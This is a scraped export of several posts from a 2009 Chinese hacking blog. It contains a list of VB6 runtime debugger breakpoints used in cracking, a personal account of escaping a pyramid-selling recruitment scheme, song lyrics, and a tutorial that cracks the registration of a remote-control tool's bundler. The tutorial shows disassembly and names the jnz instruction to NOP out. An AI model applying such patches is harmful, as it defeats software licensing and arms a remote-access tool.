msvbvm60!rtcMsgBox <br />bpx msvbvm60!__vbaStrCmp <br />bpx msvbvm60!__vbaStrComp <br />bpx msvbvm60!__vbaStrCompVar <br />bpx msvbvm60!__vbaStrTextCmp <br />bpx msvbvm60!__vbaFileOpen <br />bpx msvbvm60!__vbaInputFile <br />bpx msvbvm60!__vbaFileSeek <br />bpx msvbvm60!__vbaWriteFile <br />bpx msvbvm60!__vbaFileClose <br />bpx msvbvm60!rtcFileAttributes <br />bpx msvbvm60!rtcFileDateTime <br />bpx msvbvm60!rtcFileLen <br />bpx msvbvm60!rtcFileLength <br />bpx msvbvm60!__vbaVarInt <br />bpx msvbvm60!__vbaVarCmpGe <br />bpx msvbvm60!__vbaVarCmpGt <br />bpx msvbvm60!__vbaVarCmpLe <br />bpx msvbvm60!__vbaVarCmpLt <br />bpx msvbvm60!__vbaVarCmpNe <br />bpx msvbvm60!__vbaVarTextCmpEq <br />bpx msvbvm60!__vbaVarTextCmpGe <br />bpx msvbvm60!__vbaVarTextCmpGt <br />bpx msvbvm60!__vbaVarTextCmpLe <br />bpx msvbvm60!__vbaVarTextCmpLt <br />bpx msvbvm60!__vbaVarTextCmpNe <br />bpx msvbvm60!__vbaVarTextTstEq <br />bpx msvbvm60!__vbaVarTextTstGe <br />bpx msvbvm60!__vbaVarTextTstGt <br />bpx msvbvm60!__vbaVarTextTstLe <br />bpx msvbvm60!__vbaVarTextTstLt <br />bpx msvbvm60!__vbaVarTextTstNe <br />bpx msvbvm60!__vbaVarTstEq <br />bpx msvbvm60!__vbaVarTstGe <br />bpx msvbvm60!__vbaVarTstGt <br />bpx msvbvm60!__vbaVarTstLe <br />bpx msvbvm60!__vbaVarTstLt <br />bpx msvbvm60!__vbaVarTstNe <br /><br />注意:VB程序仍然可以使用普通API函数,只要函数“最终”CALL了这个函数 <br />上面的断点对应VB6程序,如果是VB5程序则将msvbvm60改成msvbvm50即可<br /><br /><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-10008559944567769862009-07-01T23:30:00.000+08:002009-07-01T23:31:34.354+08:00襄樊之行,龙潭虎穴诚然开始的的时候并没有意识到去湖北襄樊最后是这样的结局。多少有些意外,出现这种状况的原因在于自己的惰性,本来以为湖北是万全之旅,然而事情不是想象的那样。26号做的k208离开潍坊,到济南的时候给老婆打电话才知道她周六周日休班,如果不是买的卧铺我就会在济南停留一天。改签27号的车票,那样可以在济南停留一天,然而卧铺在改签之后剩余的卧铺就作废了。于是没有留下来,只是她说内心很不安,感觉我不好。或许是女孩子特有的直觉吧,只是当时我不知道这意味着什么。<br /> 取得旅程还算顺利,没有什么大的波折。到了之后接站也算顺利。中午没有吃饭,在小田接到我之后,发现还有一个人。看起来文质彬彬的样子。以为是他的同事,不过也没猜错,试试证明真的是,不过当时不知道是怎么样的同事。在附近的餐馆马马虎虎吃了点。然后直接到了他的住处,一个小区的八楼,后来才知道那个小区叫做三元小区。进了小区直接到了最里面的楼房,爬上八楼。进去之后发现住处总体来说还是挺大的。里面还有两男两女。简单的介绍了一下,也算是打探到了一些东西。其中五个山东的,一个是青海的。另外里面两个据说是大学生,后来的打探发现可能真的是,不过是不是只有他们自己知道。我是无从考证的。<br /> 休息了一会儿他们说打牌,如果按照正常人的思维,即使是公司来人来两个人礼节性的接待下也就可以了。那么多人都在住的地方呆着感觉有点不可思议。到了下午说的不是上班而是打牌于是有了更进一步的怀疑。他们说打也不好不打,最后决定斗地主。他们的态度倒是过分热情。玩了近两个小时的牌后,小田说出去下,而至于做什么我不清楚,刚开始以为是出去玩,因为还有两个人一个男人和一个女人。那个男人姓张,那个女人姓王,从他们口中得知,那个女人叫做王海鸥,而男人则貌似是叫做德福。在出租车上乱侃了一通,知道襄樊有几个好玩的地方,古襄阳,诸葛亮广场,还有汉江,如果没有记错的话。后来下了出租车又走了大约15-20分钟的样子到了一个小区。刚开始不明白为什么要这么做。后来才想明白是为了不让我把路线记得太清楚。即使是打的也是直说方向不说目的地,到了地方直接停车。然后步行穿过很多小区,最后又来到了一个楼上,大约是八楼,但是不是顶层。<br /><span class="fullpost"><br /> 进去之后有个女人出来接待的。我不知道是不是可以安排还是那些人真的出了姓王的就是姓张的,小田介绍的时候说的要不是王经理就是张经理。这是后话,暂且提下,后面就不说了,因为很多人的姓都是这两个。进去之后似乎明白要做什么了,只是当时还不敢确定。因为和通常的传销的阵势是不同的。感觉气氛比较温和,不想传说中的传销那么暴力。介绍完之后那个王经理开始拿出五个杯子然后在里面倒水,四个分给我们四人,剩余的一个她自己握在手里。然后就问我,你知道我们是做什么么。我说不知道。然后她就就开始给我讲,并不说做什么,只是故作高深的样子和我讲一些国家的事情。甚至包括了中国经济的发展改革史。然而自始至终都没有提到做什么。最后终于提到,我们做的项目是国家支持的。听的太多了,只记得当时说了什么国家支持,低调宣传,宏观调控。之类的东西,说的东西都是很片面的东西,然而如果真的听的话似乎也有些道理。由此可见那些人也不是吃白饭的,可谓是把心理学研究透了。后面说了一些这个工程的好话。最后说这个东西是和西部大开发联系在一起的,为了解决现在的就业问题,连最新的金融危机和大学生就业困难都提到了。说了为了解决四类人的就业问题,农村闲散劳动力,失业人员,复员军人,毕业大学生。那天天气很热,感觉暴风雨要来了。闷的异常。偌大的房间里面开个风扇感觉到的只是热风。那个女人在汗流浃背的讲,感觉有些滑稽。然而我知道后面的路不会那么简单。肯定有更多的问题。那是我到襄樊的第一天的下午,中午火车到了襄樊,下午就开始了这么一出,可谓处心积虑和急功近利。最后提到的是新入的成员可以每个月得到1k的收入,经理可以月入万元,高级业务员可以收入六位数。这就是最后的提到的内容,然而至于做什么则是绝口不提的。直说这个事儿,让我考察这个事儿。看看到底是不是好事儿,用自己的大脑分析这个事儿。然后手机就响了,我感觉那是一个信号,可以到这里就结束了,至于是不是闹钟或许是所谓的同事打的电话我就不得而知了。然后他就说我们就到这里吧。然而我知道我的处境不再那么单纯了。不是自己想象的样子,所谓的物流不过是个幌子。骗人的把戏而已。<br /> 出来之后并没有回住处,他们也不打算回住处。因为走得不是回去的路,如果回去的话那条路是最近的,这完全是凭直觉。走得是完全不同的路。走了大约半个小时左右到了另外的小区,然后又是爬楼,这次不是很高,只是四楼而已,同样还是一个女人,听口音貌似是四川人。后来她自己介绍也说自己是四川人。真假就不知道了。还是同样的做法,每人一个杯子。介绍了一下自己之后就开始了另外的介绍。问我是不是很生气。我说不生气,就是太热了,如果不热的话我一点也不生气。她说你肯定很生气,问我和小田什么关系,我说她说我姐的朋友。她继续说,你现在肯定生气,算是你哥吧,你哥把你骗来也是为了让你了解这个事儿。如果他说实话的话你也不会来对么?我说是,然后她继续说,这个事儿啊,是不是好事,值不值得做你自己考察下。我们呢可以用五到七天的时间来考察这个事儿。看是不是好事儿。现在我们国家有多少次大的经济改革你知道么?你不经常看电视吧?我说不经常看。她继续,你对中国的近代经济发展了解么?我说知道一些。然后他就开始说,从建国之初的计划经济,到后来的改革开放,然后是九几年的无息贷款?(有这么回事么?我没查也不知道)后来是股票,还有什么下海,到后来的连锁经营,问我连锁经营知道吧?我说知道。当时她并没说什么连锁的事情,而是向我解释一种什么所谓的新的经济模式,说中国现在的贪官很多啊,假货很多啊。我说是啊,是很多挺讨厌人的。然后他就说了我们现在要推广的就是一种先进的经济模式。她给我打了个比方,说生产杯子,经过市场调查需要1w个杯子。有两个工厂生产,我和她,他问我会生产多少。我说生产一万个,(饶我我就和你装傻吧)。她问为什么,我说我可以快生产啊,快卖可以卖出大于5k,想多挣点啊。她就继续说,市场只需要5k个,那剩下的杯子怎么办呢?需要村仓库吧?我说是,那么她就继续说,这样的话仓库需要租金,并且生产的东西销售不出去,成了垃圾,杯子更新换代,先进的出来了,同样面临同样的可能库存的危险。我说是啊。他就说,那么我们现在新的经济模式就来了,就是我们打破这种传统的格局。我们改变人们的消费意识。我们可以先付定金后然后生产,保质保量。这样就可以生产多少卖多少了,省了很多的麻烦。 后来热的不行了我就不说话了单纯的点头。什么都点头。又说了很多我也不记得了。让你以为把我唬住了吧。反正我也没什么损失。后来他的手机也响了,坑是是时间到了,或者是他感觉把我骗的差不多了说,然后就说我们今天就到这里吧。我说好啊,走得时候我还跟她说了声再见。<br /> 回家的路上我不想说话,一是因为我真的很热很渴。二是我现在想怎么怎么离开这里。毕竟每次出来自己是不可能的。他们也是有意无意的和我说话,乱起八遭的说我就答应点。胡说八道点。反正你们也不知道真假。互相忽悠吧。<br /> 第一天的洗脑算是到此结束。晚上回去吃饭,发现每次他们做的饭都还算丰盛。既然来了就不能饿死,就算是有毒药也要吃,如果有毒药不吃的话也是走不了的。好在他们没有做那样的事情。回去之后吃完饭给二姐发了个消息,我说小田撒谎。当时没有什么反应,我知道二姐欠于稳重可能会做出意料之外的事情。于是马上给大姐发消息说不要打电话,不要把事情弄得太僵,那样我没法处理。还是大姐聪明,马上就明白了什么事情。晚上吃完饭还是陪他们打牌。打了一段时间后小田 说去诸葛亮广场,去就去吧,龙潭虎穴都进来了也不怕那些啦。和他们几个人下来后走了很长一段路后打车到了诸葛亮广场。那个男人说要充电话费,让我和那两个女生先一起过去。我自然不会跑,因为我的东西还在他们的住处,他们很明白。也就不怕我跑。于是我陪那两个女生去看小孩子条拉丁舞。我自然也不会在大街上乱喊,我说有人绑架我传销只会让别人以为我是神经病。那就乖乖的陪他们看跳舞的吧,过了大约半小时后所有人都到了。我退到了拉丁舞围观圈子外。小田说去诸葛亮那里吧。我说好啊,于是上了雕塑的台子。在那里坐了没几分钟二姐果然给小田打电话了。小田说让我接电话我自然知道是自己发的短信有效果了,只是这样的效果不是我希望的。不过是给我增加麻烦罢了。我只好接过来走了大约十几米后才和二姐说话,我按照我的想法说了之后二姐还不信,不信他们做的是这样的勾当,说让我再看看,现在刚去还不明白。我说没什么我自己会搞清楚的。既然不信我也不能说什么,简单的说了后挂断了电话。把手机还给小田他问我说什么了,为什么打电话。我说只是感觉工作不合适,和家里说了下。我说现在没事了家里放心了。他也就没再说什么,只是说这个事儿啊,考察需要几天的时间,希望你能坚持下来。这个事儿啊,需要的是有耐心,有胆量有魄力的人才能成功的。我说是啊。任何事情都这样。后来另外两个男人说去喷泉那边我就去了。看了会儿喷泉,虽然到处是水,但是还是很热。那两个男人都在拍照。我感觉很热。然后就退出了那个圈子,他们出来说去下面。也只好跟着他们去。有人在唱歌,在那里坐了大约10分钟所有的人都过去了,说去打台球。去就去吧,不打白不打,还会让人起疑心。打了三局。赢了两局。由于太热了出汗太严重,手上架杆的地方的皮都磨破了。没办法,坚持打完了,后来他们在打。我去那两个女生的地方坐了会儿,海鸥问我吃雪糕么,我说不吃,但是她还是去买了。最后在那里做到他们打完台球,我把一瓶子矿泉水都倒到了手上感觉没那么痛了。终于第一天的半天算是熬过来了。<br /> 晚上回去之后马上给女友发了个消息,我说现在的处境可能有点问题,如果超过二十四小时没有我的消息就报警。我把现在的大体的位置和她说了之后。内心算是稍微轻松了一些,不过我也知道这样是把所有的压力都转嫁到了自己最爱的人的身上。把大体的情况和她说了下,告诉她在每条消息前面我会做特殊的标记。如果不是的话就报警吧。为了防止出现其他的情况清空了所有的短信和所有的通话记录以及发送报告。(女友说是中午发的消息,那几天想到太多了,很多的事情感觉记忆的不清楚)然后去用凉水冲了一下,感觉凉快了一些,就去睡觉了。可能是太困了,我知道睡着了他们做什么也阻止不了。索性就好好睡吧。反正都无能为力的。一切从长计议。<br /> 第二天其实很早就醒了,只是不能起来,看他们在我起床之前都说些什么,其实我知道要想听到什么也是不可能的,基本的戒备心还是有的。虽然醒了还是躺在那里,知道小田来叫我起床吃饭。我假装懒懒散散的起来,然后去洗了一把脸。跟他们吃饭,还是同样的布局,所有的人都还是那么客气。客气的有些可怕。不管了,吃饱了再说。吃完了之后还是陪他们打牌。我怀疑他们每天的生活就是这么过的。同样大约是九点左右小田又说了。说我们出去转转吧。我也不用问去哪里了,结果是很明白的。去就去吧。<br /> 同样还是左转右绕的到了一个小区,汗流浃背的爬上了一个九楼。我不知道为什么都在这么高的楼层,不过那里还算是凉快一些,多少有一些风的。可能暴风雨就要来了。<br /> 同样的布局,同样的动作,简单的介绍后开始了新的一轮洗脑运动,他开始说了,说,你知道我们做什么么?我们是怎么样的性质,国家给予什么样的关注和支持。我说不知道,迷迷糊糊的什么都不知道。然后他终于揭开了最后的面纱,说我们做的是连锁销售,我就问卖什么呢?他说我们不卖东西,我们要做的是推广这种模式推动西部大开发的进行,为国家尽自己的一份力量。我们做的是国家支持的工作,但是国家低调宣传,所以你从电视上报纸上是看不到什么报道的。这么做也是为了保持国家的安定,你想如果电视上说现在做连锁销售可以挣六位数,那么,那些有工作的人还会尽职与自己的本质工作么?医生知道这样的工作可以挣六位数还未救死扶伤,还会给人看病么?他就会先去挣六位数,让病人等着,等他挣到六位数他可能就去做其他的工作了而不是再做医生。如果让士兵知道可以挣六位数那么还会保家卫国么?我说是啊 ,是啊。然后说这么低调宣传低调做人为的也是我们的人身安全,现在很多的小混混吧,很多的坏人吧。什么地方都有吧,如果别人知道干这个可以挣到六位数绑架你怎么办?如果那样的话我们挣钱还有什么用,六位数还有什么用,我们自己都无法消受。我还是一味的点头,管他是不是呢。<br /> 后来还说了一些什么关于国家对于这个东西的政策,鼓励发展,低调宣传,宏观调控。然后说什么鼓励发展,就是要私下的宣传,不要大张旗鼓的,然后就说了一些什么国家领导人的话,记得比较清楚的一些包括国家主席和总理的,说什么去一个什么地方视察,说国家领导人说了这么一句话:让那么贫困县的地方去南方,包工程,干物流,或者做其他的事情。后来才知道这些说的工作都是骗人的把戏,不过是诱骗自己的亲戚朋友来从事所谓的这个事儿的一些借口。还有说什么一些的忘了,如果没有意外的话从其他的连锁销售的地方传出来的也是这些内容相差无几。然后问我什么学历我说本科,他就说什么对于宏观调控你应该很清楚我就不说了。不过说实话那天并没休息好,他说的时候都要睡着了,后来说的什么都记不清楚了。同样的手机响了之后她说今天上午到这里,终于又结束了一次。偶尔会给女友和家人发几条消息说明下状况。<br /> 中午回去之后还是陪他们打牌,趁吃完午饭的时候研究了一下地形,看看有没逃跑的路线。研究了一下发现没有那么糟即使被关起来,还有几条电缆可以通到天台,爬到楼顶就可以从楼梯逃走了。研究好了地形后内心的担忧也算是少了一些。吃过午饭后,大约一点左右大姐打来电话说女友去家里了让我回去。我说知道了,后来妈妈和小田又说了一些至于是什么我不知道,因为我来这里本身就是对小田的信任。只是他骗了所有人。妈妈说让他和我去买当天的车票。我知道肯定当天是不可能的。后来可能他感觉这么耗下去可能会出问题,毕竟我的手机还在我手里,我完全可以报警或者做其他的。他感觉靠下去不是办法。说问我下去还去听么,我说不去了。我先去买票。他没办法只得和我去买票。买的是第二天的火车票一点四十六。回去的时候同样没有走原来的路,我已经明白,今天下午的洗脑还是必须要进行的,没有选择的余地,只不过这次只有我们两个人,另外的两个没有去。转了一个大圈后又到了一个小区,这次又是一个女人。据说是小学没念完。<br /> 这些所谓的经理每个人的口才都很不盖,自然史经过了长期的磨练,进去后问我对这个行业理解了多少。我说还是迷迷糊糊的。小田说我买了票准备回家的。她就说,现在走了多可惜啊,你还没对这个事儿了解清楚呢。首先我说明下我们这个行业是来去自由的行业,你随时可以走,你感觉不想听了,现在走也可以,我自然不会马上走。那样可能会导致其他的后果。同样我已经知道所谓的连锁销售是什么东西,中午吃饭的时候已经用手机查过了,不过是升级版的传销而已,加了一个冠冕堂皇的名字。又把传销的历史说了一遍。说国家引进这个项目已经有十一年的历史了,之所以没有听说过是因为国家的低调宣传。如果你不亲自来是不会接触到这个事儿的。也不会了解这是个什么样的事儿,还事儿还是坏事儿。历史都是发展进步的,每个事物都是有萌芽期成长期,成熟期衰退期的。我们现在这个行业就是出于萌芽期。国内的人不了解,不理解。但是所有的事物都是有不了解到了解。由不理解到理解。正式那些有胆量有魄力的人看到了这个事物的光明前景才会从事这个行业,也就是国家为什么引进这个行业。引进说明这个行业能够解决国内经济发展的弊端,能够从根本上杜绝腐败和贪污受贿,甚至推广成功可以杜绝假货的存在。我们这个行业也是来去自由的行业,你什么时候走都可以。我们从开始到六位数最快的只需要八个月的时间。六位数你感觉多么?对于有的人来说六位数很自然,但是对于有的人说六位数是天文数字,一个农民面朝黄土背朝天的可能一辈子才能拿到六位数,但是有的人呢?一个月就能拿到。这也就是国家给每个人发放的机会,这样的机会是从中央直接发放到老百姓的手中。不经过中间的任何环节。这样的利益是最直接的。以前改革开放的口号是先让一部分人富起来,带动其他的人。现在是让底层的人先富起来然后带动全面实现小康水平。这就是国家引入这个新兴行业的目的。是为了让国家的大多数人尽快富起来,是为了支持西部大开发。古人说过国家兴亡匹夫有责,现在就是我们尽责的机会,就是我们为国家效力的机会。现在你花费几天的时间来考察这个事儿,感觉看看适合不适合你,感觉不适合你随时可以走。感觉适合你可以留下来,来拿六位数。以后即使你走了你的资产可以继承给你的亲人或者朋友,这是一个来去自由的行业,随时可以走。另外假货的源头是什么?是利润,如果所有的东西都是直接由生产者到消费者手中,那样还会有假货么?我说没有。她就继续说什么我们要做的就是推广这样的模式,让假货无处藏身,让所有消费者从根本上杜绝假货,那样卖不出去自然也就不会有人生产了。你先不要着急走,花费几天的时间吧这个事儿考察清楚,用自己的大脑思维下,看看到底这个事儿是不是我说的那样是好事,是由胆量有魄力,有耐心的人做的事儿。是不是可以拿到六位数。我们这个行业就像白开水这样透明,清澈透底,什么都是清清楚楚的。这就是桌子上的五杯白开水的寓意所在。自然每个人都有很多的话我记不清楚了。还有很多,本来是想用手机把那些东西录下来的,但是怕会成为他们的证据而对我不利。于是没有录音,单凭自己内心的记忆,想起来了上面的那么多。如果想知道具体什么情形的话可以搜索下连锁销售,所有的洗脑模式都是差不多的。这是我见得第四个经理。结局也是同样的动作。手机,结束。<br /> 开始一段时间后暴风雨终于还是来临了,到处都是水流成河。没有雨伞,根本不可能出去的。和小天来到楼下,到处都是水的,小田打电话让别人送来了雨伞和拖鞋换上之后终于出去打的回到了住处。回到住处后还是吃饭打牌,晚上和他们打了一段时间后有人想打,我就下来了,青海的那哥们说出去坐坐。我自然知道目的是什么。就过去,刚开始是天南地北的胡说八道,最后终于还是扯到了那个话题上。说我走了很可惜,说你来这里就是相信田哥,问我知道是谁把他带来的么,我说不知,他说是他的一个朋友。来的时候也是这样,作为一个新生事物都是由不理解到理解,由不熟悉到熟悉。然后就开始苦口婆心的劝我。我说我有自己的想法。我就把自己的想法说给他。他见没什么效果也就不说了。<br /> 晚上睡觉的时候小田又说了很多,说这个新生事物啊,需要几天的时间来了解,你看我把你弄到这里来,让你花了路费明天就要回去了。很可惜啊。我感觉你还是看完再走。我没说什么。说你看他们那些人文化程度都不高,现在需要的就是你们这样的人才来从事这个行业。现在社会就是那么现实,那么残酷,现在做这样的事情,只要不违法,能挣钱就行。刚开始我来的时候也感觉像传销,我和我媳妇打电话和他们说,后来花时间了解了这个事儿,发现不是那样,我又费了好的的时间和我媳妇解释清楚。这个事儿啊,新生事物了解需要一定的时间。你看你现在还没了解完就走了多可惜啊,你可以了解完了之后走,那样你以后遇到这样的事儿可以说这样的事儿不适合我,也就不用了解了。这个事儿你不来就什么也不知道,我和你说你也不会信的。就算我和你说我现在从事连锁销售每个月挣六位数 你信么?你肯定不信,我如果不说是什么事情我说我在干物流现在这样的话你不就来了么?我感觉这是个好事儿,所以才让你来看看,但是这样的事儿对每个人不一定都合适,所以你还是话几天的时间仔细了解这个事儿,考察清楚这个事儿,这样对自己也是一个交代。你看现在和我在一起的那些有的是他的父母叫来的,有的是他的姐妹,兄弟叫来的,不都是好好的么?如果不是好事,如果违法乱纪还有那么多人做么?我刚来的时候我也很生气,整天让我做这些我说现在都什么年代了,这不就是传销么?你看看你们的熊样,我就想揍他们。现在你看我不是对这个事儿也了解清楚了,也知道怎么回事了,事情就是这样,你不来就什么也不是到,国家就是这么做的,你看低调宣传,你不来永远不可能了解到这么个事儿。你知道哈佛大学么?我说知道,在学校听人说过,这里说的哈佛大学不是所谓的美国的也不是哈尔滨佛学院,而是西部的一个所谓的哈佛大学。再他们的眼里就是能学习还能挣钱的地方。我说只是知道这么个名字至于是什么就不知道了。他说这就是所谓的哈佛大学,在这里能学到很多的东西,在学校学不到的。我们这里培养的都是高素质的人才,高素质的商人。现在的人都没人情味,我们要的就是找回人们的人情味,你看我们这里的人都很热心都很客气吧。我刚来的时候他们对我也是这么热心我感觉他们就是有目的,至于是什么就不清楚了,最后发现他们都是没有目的的。小钟啊,我感觉你还是花几天的时间把这个事儿了解清楚。有很多人走了又后悔了。他不知道我当时的心思只是想离开那个地方。只要能到火车站就好了。<br /> 说了很久最后终于睡觉了。<br /> 又是漫长的一夜。<br /> 第三天上午还是那样的事情,上午吃过饭说出去下,我自然知道做什么,去就去吧。也不差那个,路上是另外的那个叫德福的所谓的大学生进行的教育,那个人是招远的,据他自己说。而两个女孩子则都是潍坊高密的。这就是大概的成员分布,三个是潍坊临朐的,也就是邻县的。也就是说所有的人都是潍坊的除了那个青海的。那天上午见得那个人也是临朐的。他说的那些我不懂,我也不知道,也不清楚他说的是真的假的。他说的都是他的一些什么故事。大部分都是虚构的吧。包括油田,包括大庆,甚至还有铁人,有军队。还有内蒙的石油管线工程,这些我都无从考证,也记不清楚了。只记得他说他是他你女儿的后爸,并且现在她女儿也在这里,甚至职位比他高,他现在做了快两年了,查两个月就可以回去了,至于为什么这个不清楚。后来终于说到了正题,说中午回去会让我看些书面性的材料,然后看看所谓的产品我知道这就是快到最后的地步了。个人感觉。那样对所谓的连锁销售就有了一个整体的认识了。<br /> 只不过中午我回去吃过饭就去了火车站。他们知道强制留下我会造成很大的麻烦。但是他们还是希望留下我进行继续洗脑,让我以为他们做的就都是对的好的哦。视为国家做贡献。是伟大的行为,是为了西部大开发。最后一次洗脑回去的路上那个德福还是苦口婆心的劝我,说什么以后不希望看到他成功了,而我在招聘会上。我说不会的,我不会去招聘会的。说什么走了很可惜,还是那些新生事物的一通。中午吃完饭下午走的时候是青海的那个所谓的大学生一起去的。说什么走了很可惜还是一直想让我回去,既然好不容易出来自然不能回去。终于到了火车站。他们让我走也是要看着我上了火车再走的,可能是怕我去报警吧。<br /> 上了火车之后给女友和家里人发了个短信,打了个电话,算是结束了这次襄樊之旅。以上的文字都是凭自己的记忆写的,很多的东西都记得不清楚了,一晚上就这么大了大约两个小时吧。1w多字,很累,这么累但是记下来。如果有相同的情况那么快离开。南方的所谓的物流,工程,老板都是搞连锁销售的。如果有其他的情节可以搜索下连锁销售,应该很多的文章的。至于是好是坏就自己判断吧。<br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com2tag:blogger.com,1999:blog-3777450046188403147.post-80952632255155160462009-06-18T23:40:00.000+08:002009-06-18T23:42:07.540+08:00英雄泪云里去,风里来<br />带着一身的尘埃<br />心也伤,情也冷,泪也干<br />悲也好,喜也好<br />命运有谁能知道<br />梦一场,是非恩怨<br />随风飘<br />看过冷漠的眼神<br />爱过一生无缘的人<br />才知世间人情永远不必问<br />热血在心中沸腾<br />却把岁月刻下伤痕<br />回首天已黄昏,有谁在乎我<br />山是山,水是水<br />往事恍然如云烟<br />流浪心已憔悴<br />谁在乎<br />英雄泪……<br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-4348165635666668162009-06-15T22:02:00.004+08:002009-07-01T10:53:01.007+08:00破解牧民战天会员捆绑器今天下载了一个牧民个人版远控。里面有个会员捆绑器。需要注册,研究了下。peid无壳,直接w32dasm载入就能看到提示信息。不过能这么搞的软件已经少之又少了。<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_r8EaiijILzk/SjZVFIC53vI/AAAAAAAAFVQ/eSxWVJcoRso/s1600-h/asm.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 232px;" src="http://2.bp.blogspot.com/_r8EaiijILzk/SjZVFIC53vI/AAAAAAAAFVQ/eSxWVJcoRso/s320/asm.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5347555154096414450" /></a><br /><span class="fullpost"><br />OD载入直接根入到50afa0就可以看到关键代码了。<br /><code><br />0050AFD4 |. E8 2BFBFFFF call 复件_牧?0050AB04<br />0050AFD9 |. 8B45 EC mov eax,dword ptr ss:[ebp-14]<br />0050AFDC |. 50 push eax<br />0050AFDD |. 8D55 DC lea edx,dword ptr ss:[ebp-24]<br />0050AFE0 |. 8B83 B0030000 mov eax,dword ptr ds:[ebx+3B0]<br />0050AFE6 |. E8 FDCAF7FF call 复件_牧?00487AE8<br />0050AFEB |. 8B45 DC mov eax,dword ptr ss:[ebp-24]<br />0050AFEE |. 8D55 E0 lea edx,dword ptr ss:[ebp-20]<br />0050AFF1 |. E8 1ED5EFFF call 复件_牧?00408514<br />0050AFF6 |. 8B55 E0 mov edx,dword ptr ss:[ebp-20]<br />0050AFF9 |. 58 pop eax<br />0050AFFA |. E8 A994EFFF call 复件_牧?004044A8<br />0050AFFF 0F85 A3000000 jnz 复件_牧?0050B0A8 //这一行直接nop掉就可以了。<br />0050B005 |. 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL<br />0050B007 |. 68 38B15000 push 复件_牧?0050B138 ; |Title = "提示"<br />0050B00C |. 68 60B15000 push 复件_牧?0050B160 ; |Text = "恭喜,注册成功!"<br />0050B011 |. 6A 00 push 0 ; |hOwner = NULL<br />0050B013 |. E8 D0BDEFFF call <jmp.&user32.MessageBoxA> ; \MessageBoxA<br />0050B018 |. C605 581C5200 01 mov byte ptr ds:[521C58],1<br />0050B01F |. BA 78B15000 mov edx,复件_牧?0050B178<br />0050B024 |. 8B83 B4030000 mov eax,dword ptr ds:[ebx+3B4]<br />0050B02A |. E8 4D01F4FF call 复件_牧?0044B17C<br />0050B02F |. 33D2 xor edx,edx<br />0050B031 |. 8B83 B4030000 mov eax,dword ptr ds:[ebx+3B4]<br />0050B037 |. 8B08 mov ecx,dword ptr ds:[eax]<br />0050B039 |. FF51 64 call dword ptr ds:[ecx+64]<br />0050B03C |. 33D2 xor edx,edx<br />0050B03E |. 8B83 AC030000 mov eax,dword ptr ds:[ebx+3AC]<br /></code><br />修改方法<br />0050AFFF 0F85 A3000000 jnz 复件_牧?0050B0A8 //这一行直接nop掉就可以了。<br />任意注册码注册成功,效果图。<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_r8EaiijILzk/SjZVE3lilkI/AAAAAAAAFVI/2wspgfGIsi8/s1600-h/2.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 275px; height: 320px;" src="http://2.bp.blogspot.com/_r8EaiijILzk/SjZVE3lilkI/AAAAAAAAFVI/2wspgfGIsi8/s320/2.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5347555149678286402" /></a><br />注册后功能是没有缺失的。 <br /><a 